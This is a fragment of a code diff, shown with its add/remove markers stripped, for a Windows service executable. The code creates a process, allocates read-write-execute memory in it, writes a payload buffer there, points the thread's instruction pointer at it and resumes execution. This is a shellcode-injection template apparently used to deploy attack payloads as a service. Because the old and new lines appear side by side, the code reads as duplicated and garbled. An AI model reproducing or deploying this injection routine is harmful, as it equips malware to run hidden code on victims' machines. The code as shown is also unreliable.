lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if( lpPayload )
{
WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
#ifdef _WIN64
Context.Rip = (DWORD64)lpPayload;
Context.Rip = (ULONG_PTR)lpPayload;
#else
Context.Eip = (DWORD)lpPayload;
Context.Eip = (ULONG_PTR)lpPayload;
#endif
SetThreadContext( pi.hThread, &Context );
}
ResumeThread( pi.hThread );
CloseHandle( pi.hThread );
CloseHandle( pi.hProcess );
}
ServiceHandler( SERVICE_CONTROL_STOP );
ExitProcess( 0 );
}
}
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
/*
*
*/
int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
void main()
{
SERVICE_TABLE_ENTRY st[] =
{
{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
{ NULL, NULL }
};
return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
SERVICE_TABLE_ENTRY st[] =
{
{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
{ NULL, NULL }
};
StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
return;
}
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More